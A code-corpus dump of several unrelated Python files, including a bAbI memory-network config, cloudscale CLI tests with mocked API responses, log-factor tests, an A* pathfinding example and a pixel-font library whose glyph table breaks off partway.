self.val_range = np.array(range(nb_train_questions, nb_questions))
self.enable_time = True # add time embeddings
self.use_bow = False # use Bag-of-Words instead of Position-Encoding
self.linear_start = True
self.share_type = 1 # 1: adjacent, 2: layer-wise weight tying
self.randomize_time = 0.1 # amount of noise injected into time index
self.add_proj = False # add linear layer between internal states
self.add_nonlin = False # add non-linearity to internal states
if self.linear_start:
self.ls_nepochs = 20
self.ls_lrate_decay_step = 21
self.ls_init_lrate = 0.01 / 2
# Training configuration
self.train_config = {
"init_lrate" : 0.01,
"max_grad_norm": 40,
"in_dim" : 20,
"out_dim" : 20,
"sz" : min(50, train_story.shape[1]), # number of sentences
"voc_sz" : len(self.dictionary),
"bsz" : self.batch_size,
"max_words" : len(train_story),
"weight" : None
}
if self.linear_start:
self.train_config["init_lrate"] = 0.01 / 2
if self.enable_time:
self.train_config.update({
"voc_sz" : self.train_config["voc_sz"] + self.train_config["sz"],
"max_words": self.train_config["max_words"] + 1 # Add 1 for time words
})
class BabiConfigJoint(object):
"""
Joint configuration for bAbI
"""
def __init__(self, train_story, train_questions, dictionary):
# TODO: Inherit from BabiConfig
self.dictionary = dictionary
self.batch_size = 32
self.nhops = 3
self.nepochs = 60
        self.lrate_decay_step = 15  # reduce learning rate by half every 15 epochs  # XXX:
# Use 10% of training data for validation # XXX
nb_questions = train_questions.shape[1]
nb_train_questions = int(nb_questions * 0.9)
# Randomly split to training and validation sets
rp = np.random.permutation(nb_questions)
self.train_range = rp[:nb_train_questions]
self.val_range = rp[nb_train_questions:]
self.enable_time = True # add time embeddings
self.use_bow = False # use Bag-of-Words instead of Position-Encoding
self.linear_start = True
self.share_type = 1 # 1: adjacent, 2: layer-wise weight tying
self.randomize_time = 0.1 # amount of noise injected into time index
self.add_proj = False # add linear layer between internal states
self.add_nonlin = False # add non-linearity to internal states
if self.linear_start:
self.ls_nepochs = 30 # XXX:
self.ls_lrate_decay_step = 31 # XXX:
self.ls_init_lrate = 0.01 / 2
# Training configuration
self.train_config = {
"init_lrate" : 0.01,
"max_grad_norm": 40,
"in_dim" : 50, # XXX:
"out_dim" : 50, # XXX:
"sz" : min(50, train_story.shape[1]),
"voc_sz" : len(self.dictionary),
"bsz" : self.batch_size,
"max_words" : len(train_story),
"weight" : None
}
if self.linear_start:
self.train_config["init_lrate"] = 0.01 / 2
if self.enable_time:
self.train_config.update({
"voc_sz" : self.train_config["voc_sz"] + self.train_config["sz"],
"max_words": self.train_config["max_words"] + 1 # Add 1 for time words
})
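# Illustrative usage sketch (added for clarity; not part of the original
# config.py): one way BabiConfig could be instantiated with toy inputs. The
# array shapes are assumptions inferred from how train_story.shape[1],
# train_questions.shape[1] and len(train_story) are used above.
if __name__ == "__main__":
    toy_dictionary = {"nil": 0, "john": 1, "mary": 2, "went": 3, "where": 4}
    toy_story = np.zeros((20, 8), dtype=np.int32)        # len(train_story)=20, 8 stories
    toy_questions = np.zeros((14, 100), dtype=np.int32)  # 100 questions
    config = BabiConfig(toy_story, toy_questions, toy_dictionary)
    # With enable_time=True, voc_sz grows by the number of sentences (sz)
    print(config.train_config["voc_sz"], len(config.train_range), len(config.val_range))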
[per-file quality-signal columns for the preceding record omitted]
hexsha: 1ecbf1d954ad8ddf802ad0eda35dd930e06061c4 | size: 8,362 | ext: py | lang: Python
path: tests/test_server.py | repo: cloudscale-ch/cloudscale-cli | head: 29e7d0c3820b5903a6b509b9edef3063f388fd7c | licenses: ["MIT"]
stars: 7 (2020-07-18T07:15:58.000Z to 2020-12-10T13:25:08.000Z) | issues: 18 (2020-08-17T22:12:34.000Z to 2021-05-17T14:59:07.000Z) | forks: null
content:
from cloudscale import CLOUDSCALE_API_URL
from cloudscale_cli.cli import cli
import responses
import click
from click.testing import CliRunner
SERVER_RESP = {
"uuid": "47cec963-fcd2-482f-bdb6-24461b2d47b1",
"name": "db-master",
"status": "running",
"zone": {
"slug": "lpg1"
},
"flavor": {
"slug": "flex-4",
},
"image": {
"slug": "debian-9",
},
"server_groups": [],
"anti_affinity_with": [],
"tags": {
"project": "gemini"
}
}
@responses.activate
def test_server_get_all():
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers',
json=[SERVER_RESP],
status=200)
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers',
json={
"detail": "Server error."
},
status=500)
runner = CliRunner()
result = runner.invoke(cli, [
'-a',
'token',
'server',
'list',
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a',
'token',
'server',
'list',
])
assert result.exit_code > 0
@responses.activate
def test_server_get_all_filtered():
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers',
json=[SERVER_RESP],
status=200)
runner = CliRunner()
result = runner.invoke(cli, [
'-a',
'token',
'server',
'list',
'--filter-tag',
'project=gemini'
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a',
'token',
'server',
'list',
'--filter-tag',
'project'
])
assert result.exit_code == 0
@responses.activate
def test_server_get_by_uuid():
uuid = "47cec963-fcd2-482f-bdb6-24461b2d47b1"
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json=SERVER_RESP,
status=200)
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json={
"detail": "Server error."
},
status=500)
runner = CliRunner()
result = runner.invoke(cli, [
'-a', 'token',
'server',
'show',
uuid,
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a', 'token',
'server',
'show',
uuid,
])
assert result.exit_code > 0
@responses.activate
def test_server_delete():
uuid = "47cec963-fcd2-482f-bdb6-24461b2d47b1"
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json=SERVER_RESP,
status=200)
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers/unknown',
json=SERVER_RESP,
status=200)
responses.add(
responses.DELETE,
CLOUDSCALE_API_URL + '/servers/' + uuid,
status=204)
responses.add(
responses.DELETE,
CLOUDSCALE_API_URL + '/servers/unknown',
json={
"detail": "Not found."
},
status=404)
runner = CliRunner()
result = runner.invoke(cli, [
'-a', 'token',
'server',
'delete',
uuid,
])
assert result.exit_code == 1
runner = CliRunner()
result = runner.invoke(cli, [
'-a', 'token',
'server',
'delete',
'--force',
uuid,
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a', 'token',
'server',
'delete',
'--force',
'unknown',
])
assert result.exit_code > 0
def test_server_missing_api_key():
runner = CliRunner()
result = runner.invoke(cli, [
'server',
'list',
])
assert result.exit_code == 1
@responses.activate
def test_server_create():
name = "db-master"
flavor = "flex-4"
image = "debian9"
responses.add(
responses.POST,
CLOUDSCALE_API_URL + '/servers',
json=SERVER_RESP,
status=201)
responses.add(
responses.POST,
CLOUDSCALE_API_URL + '/servers',
json={
"detail": "Server error."
},
status=500)
runner = CliRunner()
result = runner.invoke(cli, [
'-a', 'token',
'server',
'create',
'--name',
name,
'--flavor',
flavor,
'--image',
image
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a', 'token',
'server',
'create',
'--name',
name,
'--flavor',
flavor,
'--image',
image
])
assert result.exit_code > 0
@responses.activate
def test_server_update():
uuid = "47cec963-fcd2-482f-bdb6-24461b2d47b1"
name = "db-master"
responses.add(
responses.PATCH,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json=SERVER_RESP,
status=204)
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json=SERVER_RESP,
status=200)
responses.add(
responses.PATCH,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json={
"detail": "Server error."
},
status=500)
runner = CliRunner()
result = runner.invoke(cli, [
'-a', 'token',
'server',
'update',
'--name',
name,
'--tag',
'project=gemini',
uuid,
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a', 'token',
'server',
'update',
'--name',
name,
'--tag',
'project=gemini',
uuid,
])
assert result.exit_code > 0
@responses.activate
def test_server_start():
uuid = "47cec963-fcd2-482f-bdb6-24461b2d47b1"
responses.add(
responses.POST,
CLOUDSCALE_API_URL + '/servers/' + uuid + '/start',
status=204)
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json=SERVER_RESP,
status=200)
responses.add(
responses.POST,
CLOUDSCALE_API_URL + '/servers/' + uuid + '/start',
json={
"detail": "Server error."
},
status=500)
runner = CliRunner()
result = runner.invoke(cli, [
'-a', 'token',
'server',
'start',
uuid,
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a', 'token',
'server',
'start',
uuid,
])
assert result.exit_code > 0
@responses.activate
def test_server_stop():
uuid = "47cec963-fcd2-482f-bdb6-24461b2d47b1"
responses.add(
responses.POST,
CLOUDSCALE_API_URL + '/servers/' + uuid + '/stop',
status=204)
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json=SERVER_RESP,
status=200)
responses.add(
responses.POST,
CLOUDSCALE_API_URL + '/servers/' + uuid + '/stop',
json={
"detail": "Server error."
},
status=500)
runner = CliRunner()
result = runner.invoke(cli, [
'-a', 'token',
'server',
'stop',
uuid,
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a', 'token',
'server',
'stop',
uuid,
])
assert result.exit_code > 0
@responses.activate
def test_server_reboot():
uuid = "47cec963-fcd2-482f-bdb6-24461b2d47b1"
responses.add(
responses.POST,
CLOUDSCALE_API_URL + '/servers/' + uuid + '/reboot',
status=204)
responses.add(
responses.GET,
CLOUDSCALE_API_URL + '/servers/' + uuid,
json=SERVER_RESP,
status=200)
responses.add(
responses.POST,
CLOUDSCALE_API_URL + '/servers/' + uuid + '/reboot',
json={
"detail": "Server error."
},
status=500)
runner = CliRunner()
result = runner.invoke(cli, [
'-a', 'token',
'server',
'reboot',
uuid,
])
assert result.exit_code == 0
result = runner.invoke(cli, [
'-a', 'token',
'server',
'reboot',
uuid,
])
assert result.exit_code > 0
[per-file quality-signal columns for the preceding record omitted]
hexsha: 94a2baa02699768c32c93318713c3f38db98c875 | size: 168 | ext: py | lang: Python
path: simple_ddpm/__init__.py | repo: peterhessey/denoising-diffusion-pytorch | head: 031e31b46928fa87e51e8c25d778039b65fa1c38 | licenses: ["MIT"]
stars: null | issues: null | forks: null
content:
from simple_ddpm.main import Trainer
from simple_ddpm.gaussian_diffusion import GaussianDiffusion
from simple_ddpm.u_net import Unet
import simple_ddpm.helper_functions
[per-file quality-signal columns for the preceding record omitted]
hexsha: 94ef4fde4d5af9bdc7bb5a9cba7708cb8e8f5c43 | size: 209 | ext: py | lang: Python
path: challenges/shift-array/test_shift_array.py | repo: brandonholderman/data-structures-and-algorithms | head: 9b9aa0eac1fe305d9655537c90a24dd263a42df9 | licenses: ["MIT"]
stars: null | issues: null | forks: null
content:
import shift_array as sa
def test_insert_shift_array():
assert sa.insert_shift_array([1, 2, 3, 4], 40) == [1, 2, 40, 3, 4]
def test_empty_shift_array():
assert sa.insert_shift_array([], 46) == [46]
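# Illustrative reference sketch (added; not part of the original test file): one
# implementation that would satisfy the two tests above. The midpoint rule
# len(arr) // 2 is an assumption -- the tests only constrain the even-length and
# empty cases, so the actual shift_array module may round differently.
def _insert_shift_array_sketch(arr, value):
    mid = len(arr) // 2
    return arr[:mid] + [value] + arr[mid:]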
[per-file quality-signal columns for the preceding record omitted]
hexsha: a2085610c62ff7ce2ddf76df90e38f510813ff6c | size: 37 | ext: py | lang: Python
path: aiida_sirius/upf_to_json/__init__.py | repo: simonpintarelli/aiida-sirius | head: 5dc968cc4a98a5d0b018f54c4c7023b2a2682795 | licenses: ["MIT"]
stars: null | issues: null | forks: null
content:
from .upf_to_json import upf_to_json
[per-file quality-signal columns for the preceding record omitted]
hexsha: a21a9a1e3adc93f5817ccfe90698420f098a3898 | size: 5,761 | ext: py | lang: Python
path: tests/log_factor_test.py | repo: Edderic/linx | head: 24fe3e043c991fd01dbf1dcab978d5ab2b8a7b76 | licenses: ["MIT"]
stars: null | issues: null | forks: null
content:
import numpy as np
import pandas as pd
from ..linx.log_factor import LogFactor
from ..linx.data import ParquetData
from .conftest import (assert_approx_value_df, get_tmp_path, clean_tmp)
def test_log_factor_add():
clean_tmp()
df_1 = pd.DataFrame([
{'x': 0, 'y': 0, 'value': np.log(0.5)},
{'x': 0, 'y': 1, 'value': np.log(0.6)},
{'x': 1, 'y': 0, 'value': np.log(0.8)},
{'x': 1, 'y': 1, 'value': np.log(0.7)},
])
log_factor_1 = LogFactor(
ParquetData(
df_1,
storage_folder=get_tmp_path()
)
)
df_2 = pd.DataFrame([
{'x': 0, 'value': np.log(0.5)},
{'x': 1, 'value': np.log(0.2)},
])
log_factor_2 = LogFactor(
ParquetData(
df_2,
storage_folder=get_tmp_path()
)
)
new_log_factor = log_factor_1.add(log_factor_2)
expected_df = pd.DataFrame([
{'x': 0, 'y': 0, 'value': np.log(0.25)},
{'x': 0, 'y': 1, 'value': np.log(0.3)},
{'x': 1, 'y': 0, 'value': np.log(0.16)},
{'x': 1, 'y': 1, 'value': np.log(0.14)},
])
assert_approx_value_df(
new_log_factor.data.read(),
expected_df,
)
def test_log_factor_subtract():
clean_tmp()
df_1 = pd.DataFrame([
{'x': 0, 'y': 0, 'value': np.log(0.5)},
{'x': 0, 'y': 1, 'value': np.log(0.6)},
{'x': 1, 'y': 0, 'value': np.log(0.9)},
{'x': 1, 'y': 1, 'value': np.log(0.3)},
])
log_factor_1 = LogFactor(
ParquetData(
df_1,
storage_folder=get_tmp_path()
)
)
df_2 = pd.DataFrame([
{'x': 0, 'value': np.log(0.1)},
{'x': 1, 'value': np.log(0.3)},
])
log_factor_2 = LogFactor(
ParquetData(
df_2,
storage_folder=get_tmp_path()
)
)
new_log_factor = log_factor_1.subtract(log_factor_2)
expected_df = pd.DataFrame([
{'x': 0, 'y': 0, 'value': np.log(5)},
{'x': 0, 'y': 1, 'value': np.log(6)},
{'x': 1, 'y': 0, 'value': np.log(3)},
{'x': 1, 'y': 1, 'value': np.log(1)},
])
assert_approx_value_df(
new_log_factor.data.read(),
expected_df,
)
def test_sum_even_groupings_1():
clean_tmp()
df_1 = pd.DataFrame([
{'x': 0, 'y': 0, 'value': np.log(0.3)},
{'x': 0, 'y': 1, 'value': np.log(0.1)},
{'x': 1, 'y': 0, 'value': np.log(0.7)},
{'x': 1, 'y': 1, 'value': np.log(0.9)},
])
log_factor_1 = LogFactor(
ParquetData(
df_1,
storage_folder=get_tmp_path()
)
)
new_log_factor = log_factor_1.sum('x')
expected_df = pd.DataFrame([
{'y': 0, 'value': np.log(1)},
{'y': 1, 'value': np.log(1)},
])
assert_approx_value_df(
new_log_factor.data.read(),
expected_df,
)
def test_sum_even_groupings_2():
clean_tmp()
df_1 = pd.DataFrame([
{'x': 0, 'y': 0, 'value': np.log(0.1)},
{'x': 0, 'y': 1, 'value': np.log(0.2)},
{'x': 1, 'y': 0, 'value': np.log(0.3)},
{'x': 1, 'y': 1, 'value': np.log(0.4)},
])
log_factor_1 = LogFactor(
ParquetData(
df_1,
storage_folder=get_tmp_path()
)
)
new_log_factor = log_factor_1.sum('x')
expected_df = pd.DataFrame([
{'y': 0, 'value': np.log(0.4)},
{'y': 1, 'value': np.log(0.6)},
])
assert_approx_value_df(
new_log_factor.data.read(),
expected_df,
)
def test_sum_odd_groupings_1():
"""
    When there is an odd number of groupings, they should still be
    processed correctly.
"""
clean_tmp()
df_1 = pd.DataFrame([
{'x': 0, 'y': 0, 'value': np.log(0.1)},
{'x': 0, 'y': 1, 'value': np.log(0.2)},
{'x': 0, 'y': 2, 'value': np.log(0.2)},
{'x': 1, 'y': 0, 'value': np.log(0.3)},
{'x': 1, 'y': 1, 'value': np.log(0.4)},
{'x': 1, 'y': 2, 'value': np.log(0.1)},
])
log_factor_1 = LogFactor(
ParquetData(
df_1,
storage_folder=get_tmp_path()
)
)
new_log_factor = log_factor_1.sum('y')
expected_df = pd.DataFrame([
{'x': 0, 'value': np.log(0.5)},
{'x': 1, 'value': np.log(0.8)},
])
assert_approx_value_df(
new_log_factor.data.read(),
expected_df,
)
def test_sum_even_and_odd_groupings_1():
clean_tmp()
df_1 = pd.DataFrame([
{'x': 0, 'y': 1, 'value': np.log(0.2)},
{'x': 0, 'y': 2, 'value': np.log(0.2)},
{'x': 1, 'y': 0, 'value': np.log(0.3)},
{'x': 1, 'y': 1, 'value': np.log(0.4)},
{'x': 1, 'y': 2, 'value': np.log(0.1)},
])
log_factor_1 = LogFactor(
ParquetData(
df_1,
storage_folder=get_tmp_path()
)
)
new_log_factor = log_factor_1.sum('y')
expected_df = pd.DataFrame([
{'x': 0, 'value': np.log(0.4)},
{'x': 1, 'value': np.log(0.8)},
])
assert_approx_value_df(
new_log_factor.data.read(),
expected_df,
)
def test_sum_only_one_row_groupings_1():
"""
It should do nothing to the data.
"""
clean_tmp()
df_1 = pd.DataFrame([
{'x': 0, 'y': 1, 'value': np.log(0.2)},
{'x': 1, 'y': 2, 'value': np.log(0.1)},
])
log_factor_1 = LogFactor(
ParquetData(
df_1,
storage_folder=get_tmp_path()
)
)
new_log_factor = log_factor_1.sum('y')
expected_df = pd.DataFrame([
{'x': 0, 'value': np.log(0.2)},
{'x': 1, 'value': np.log(0.1)},
])
assert_approx_value_df(
new_log_factor.data.read(),
expected_df,
)
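# Illustrative check (added; not part of the original test file): the expected
# values above follow from log-space arithmetic -- adding log factors multiplies
# the underlying probabilities and subtracting them divides, e.g.:
assert np.isclose(np.log(0.5) + np.log(0.5), np.log(0.25))   # add test, x=0, y=0
assert np.isclose(np.log(0.9) - np.log(0.3), np.log(3))      # subtract test, x=1, y=0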
[per-file quality-signal columns for the preceding record omitted]
hexsha: a2299939bf4b520ceb4977bc4604e3712661e30f | size: 82 | ext: py | lang: Python
path: web/vicopo/exemple.py | repo: monoulou/lrm | head: 170b84ae4c68d2731fd8533f4918fd219746ba44 | licenses: ["MIT"]
stars: 25 (2016-12-21T11:53:04.000Z to 2021-04-02T09:12:40.000Z) | issues: 34 (2016-08-09T09:02:49.000Z to 2021-10-13T10:50:50.000Z) | forks: 6 (2016-08-31T16:47:40.000Z to 2021-11-08T10:28:41.000Z)
content:
from Vicopo import Vicopo
print(Vicopo.http(75001))
print(Vicopo.http('paris'))
[per-file quality-signal columns for the preceding record omitted]
hexsha: bf42b3069f06a83b550d1ed6a833b9061150898c | size: 2,243 | ext: py | lang: Python
path: examples/example_path.py | repo: MeganTj/pyastar2d | head: 62372a82540e4abdba1fdd0746566a4cfe154be5 | licenses: ["MIT"]
stars: null | issues: null | forks: null
content:
import numpy as np
import pyastar2d
# The start and goal coordinates are in matrix coordinates (i, j).
start = (1, 0)
goal = (3, 3)
dist_weight = 0.01
# The minimum cost must be 1 for the heuristic to be valid.
weights = np.ones((4, 4), dtype=np.float32) - np.array([[1, 0, 0, 0],
[1, 0, 0, 1],
[0, 0, 0, 1],
[0, 1, 1, 1],], dtype=np.float32)
print("Cost matrix:")
print(weights)
path = pyastar2d.astar_path(weights, dist_weight, start, goal, allow_diagonal=False)
# The path is returned as a numpy array of (i, j) coordinates.
print(f"Best path from {start} to {goal} found:")
print(path)
start = (1, 3)
goal = (3, 3)
# The minimum cost must be 1 for the heuristic to be valid.
weights = np.ones((4, 4), dtype=np.float32) - np.array([[0, 0, 0, 0],
[0, 0, 0, 1],
[0, 0, 0, 1],
[0, 1, 1, 1],], dtype=np.float32)
print("Cost matrix:")
print(weights)
path = pyastar2d.astar_path(weights, dist_weight, start, goal, allow_diagonal=False)
# The path is returned as a numpy array of (i, j) coordinates.
print(f"Best path from {start} to {goal} found:")
print(path)
start = (2, 1)
goal = (3, 3)
# The minimum cost must be 1 for the heuristic to be valid.
weights = np.ones((4, 4), dtype=np.float32) - np.array([[0, 0, 0, 0],
[0, 1, 1, 1],
[0, 1, 0, 1],
[0, 1, 1, 1],], dtype=np.float32)
print("Cost matrix:")
print(weights)
path = pyastar2d.astar_path(weights, dist_weight, start, goal, allow_diagonal=False)
# The path is returned as a numpy array of (i, j) coordinates.
print(f"Best path from {start} to {goal} found:")
print(path)
start = (1, 2)
goal = (3, 2)
# The minimum cost must be 1 for the heuristic to be valid.
weights = np.ones((4, 4), dtype=np.float32) - np.array([[0, 0, 0, 0],
[0, 1, 1, 1],
[0, 1, 0, 1],
[0, 1, 1, 1],], dtype=np.float32)
print("Cost matrix:")
print(weights)
path = pyastar2d.astar_path(weights, dist_weight, start, goal, allow_diagonal=False)
# The path is returned as a numpy array of (i, j) coordinates.
print(f"Best path from {start} to {goal} found:")
print(path)
[per-file quality-signal columns for the preceding record omitted]
hexsha: bf5385c1414fcb1ad0f1f297c2cc0f461e3c9e20 | size: 112,076 | ext: py | lang: Python
path: pilot_fonts.py | repo: hansom82/pilot-clock | head: 629d743f056e1ec2fc02c56b1153f257312d6361 | licenses: ["MIT"]
stars: null | issues: null | forks: null
content:
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Font library of pilotClock project
# (c) Hansom 2018
from PIL import Image, ImageDraw
def font2bitmapFont(font=[], font_height=8):
"""
Method for converting standard Luma font to list of PIL images
:param font: Luma font bit pattern
:param font_height: Font height
:return: List of letter images
"""
bitmap_font = []
for letter in font:
bmp = Image.new("1", (len(letter), font_height), 0)
draw = ImageDraw.Draw(bmp)
for x, byte in enumerate(letter):
for y in range(font_height):
if byte & 0x01 > 0:
draw.point((x, y), fill="white")
byte >>= 1
del draw
bitmap_font.append(bmp)
del bmp
return bitmap_font
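# Illustrative usage sketch (added; not part of the original pilot_fonts.py):
# convert the digit glyphs defined below into PIL images. Indexing by ord('0')
# assumes the table is laid out in character-code order, and font_height=10
# matches the 10-bit columns used by the digit patterns.
def _render_digits_example():
    images = font2bitmapFont(DIGITS_FONT, font_height=10)
    zero = images[ord('0')]   # mode "1" PIL image, 8 pixels wide, 10 pixels tall
    print(zero.size)          # -> (8, 10)
    return zero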
#: Bit patterns for the pilotClock Digits, font height = 10
DIGITS_FONT = [
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x00
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x01
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x02
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x03
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x04
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x05
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x06
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x07
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x08
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x09
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x0F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x10
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x11
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x12
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x13
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x14
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x15
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x16
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x17
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x18
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x19
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1A
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1B
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1C
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1D
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1E
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 0x1F
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ' '
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '!'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '"'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '#'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '$'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '%'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '&'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '''
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '('
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ')'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '*'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '+'
    [0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ','
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '-'
[0x0000, 0x0000, 0x0300, 0x0300, 0x0000, 0x0000, 0x0000, 0x0000], # '.'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '/'
[0x03FF, 0x03FF, 0x0301, 0x0301, 0x03FF, 0x03FF, 0x0000, 0x0000], # '0'
[0x0000, 0x0301, 0x03FF, 0x03FF, 0x0300, 0x0000, 0x0000, 0x0000], # '1'
[0x03F1, 0x03F1, 0x0311, 0x0311, 0x031F, 0x031F, 0x0000, 0x0000], # '2'
[0x0311, 0x0311, 0x0311, 0x0311, 0x03FF, 0x03FF, 0x0000, 0x0000], # '3'
[0x001F, 0x001F, 0x0010, 0x0010, 0x03FF, 0x03FF, 0x0000, 0x0000], # '4'
[0x031F, 0x031F, 0x0311, 0x0311, 0x03F1, 0x03F1, 0x0000, 0x0000], # '5'
[0x03FF, 0x03FF, 0x0311, 0x0311, 0x03F1, 0x03F1, 0x0000, 0x0000], # '6'
[0x0001, 0x0001, 0x0001, 0x0001, 0x03FF, 0x03FF, 0x0000, 0x0000], # '7'
[0x03FF, 0x03FF, 0x0311, 0x0311, 0x03FF, 0x03FF, 0x0000, 0x0000], # '8'
[0x031F, 0x031F, 0x0311, 0x0311, 0x03FF, 0x03FF, 0x0000, 0x0000], # '9'
[0x0000, 0x0000, 0x0186, 0x0186, 0x0000, 0x0000, 0x0000, 0x0000], # ':'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # ';'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '<'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '='
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '>'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '?'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # '@'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'A'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'B'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'C'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'D'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'E'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'F'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'G'
[0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000], # 'H'
